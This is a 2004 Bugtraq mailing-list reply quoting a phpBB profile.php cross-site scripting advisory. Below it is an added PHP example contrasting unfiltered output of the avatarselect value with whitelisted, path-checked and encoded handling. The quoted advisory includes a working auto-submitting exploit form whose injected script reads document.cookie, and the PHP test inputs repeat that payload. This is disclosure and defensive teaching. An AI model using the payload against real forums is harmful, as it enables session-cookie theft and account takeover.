RE: Fw: phpBB profile.php Cross Site Scripting Vulnerability

micheal_at_michealcottingham.com
Date: 03/22/04

    To: bugtraq@securityfocus.com
    Date: Mon, 22 Mar 2004 15:29:50 -0500
    
    

    I'm going to say this again. Please contact security@ before posting here,
    and give them an appropriate amount of time to reply. This goes for _any_
    software company. Thank you.

    ----- Original Message -----
    From: "Cheng Peng Su" <apple_soup@msn.com>
    To: <bugtraq@securityfocus.com>
    Sent: Saturday, March 20, 2004 10:36 PM
    Subject: phpBB profile.php Cross Site Scripting Vulnerability

    |
    |
    |
    | #####################################################################
    |
    | Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
    | Release Date : Mar 21,2004
    | Application : phpBB
    | Version : phpBB 2.0.6d or others?
    | Platform : PHP
    | Vendor URL : http://www.phpbb.com/
    | Author : Cheng Peng Su(apple_soup_at_msn.com)
    |
    | #####################################################################
    |
    | Proof of Concept:
    |
    | This vuln is in profile.php. When you click [Show Gallery], phpBB
    | will show you the Avatar gallery, asking you to choose one for yourself.
    | The hole is in the form: after submitting, phpBB will use the value of
    | "avatarselect" as the path of the gallery directly, without filtering
    | any illegal characters.
    |
    | Exploit:
    |
    | -------------exploit.htm--------------
    | <form name='f' action="http://site/profile.php?mode=editprofile" method="post">
    | <input name="avatarselect" value='"><script>alert(document.cookie)</script>'>
    | <input type="submit" name="submitavatar" value="Select avatar">
    | </form>
    | <script>
    | window.onload=function()
    | {
    | document.all.submitavatar.click();
    | }
    | </script>
    | ---------------end-------------------
    |
    | Contact:
    |
    | Cheng Peng Su
    | Class 1,Senior 2,High school attached to Wuhan University
    | Wuhan,Hubei,China(430072)
    | apple_soup_at_msn.com
    |

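A server-side handler for this parameter, as an added example that is neither phpBB's code nor the advisory's: it keeps the unfiltered reflection the advisory describes beside a version that whitelists the value, confirms it resolves inside the gallery root, and entity-encodes it on output. Function names and `$galleryRoot` are assumptions.

```php
<?php
// Added example, not phpBB's own code. Shows the unfiltered pattern the
// advisory describes next to a hardened handler for the "avatarselect" value.
// Function names and $galleryRoot are hypothetical.

// Unfiltered pattern: the submitted value is reflected straight into an
// attribute, so a value beginning with "> closes the tag early.
function render_avatar_field_unfiltered(string $selected): string
{
    return '<input name="avatarselect" value="' . $selected . '">';
}

// Step 1: syntactic whitelist. Only "category/name.ext" with a narrow
// character set passes; quotes, "<", "..", NUL and absolute paths cannot.
function is_wellformed_avatar_name(string $selected): bool
{
    return (bool) preg_match(
        '#^[A-Za-z0-9_-]+/[A-Za-z0-9_-]+\.(gif|jpe?g|png)$#',
        $selected
    );
}

// Step 2: the name must resolve to a real file inside the gallery root.
// realpath() collapses symlinks and "..", so a prefix check on the
// canonical path is reliable.
function resolve_avatar_path(string $selected, string $galleryRoot): ?string
{
    if (!is_wellformed_avatar_name($selected)) {
        return null;
    }
    $root = realpath($galleryRoot);
    $file = realpath($galleryRoot . DIRECTORY_SEPARATOR . $selected);
    if ($root === false || $file === false
        || strncmp($file, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Step 3: encode on output even for validated values (defence in depth).
function render_avatar_field(string $selected): string
{
    return '<input name="avatarselect" value="'
        . htmlspecialchars($selected, ENT_QUOTES, 'UTF-8') . '">';
}

// Constructed inputs: the advisory's payload shape, a legitimate name, traversal.
$inputs = ['"><script>alert(document.cookie)</script>', 'smilies/grin.gif', 'x/../y.gif'];
foreach ($inputs as $in) {
    printf("%-45s wellformed=%s encoded=%s\n", $in,
        is_wellformed_avatar_name($in) ? 'yes' : 'no', render_avatar_field($in));
}
```

The regex rejects all three hostile shapes before any filesystem access; `resolve_avatar_path()` is the check to call when a gallery directory actually exists.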

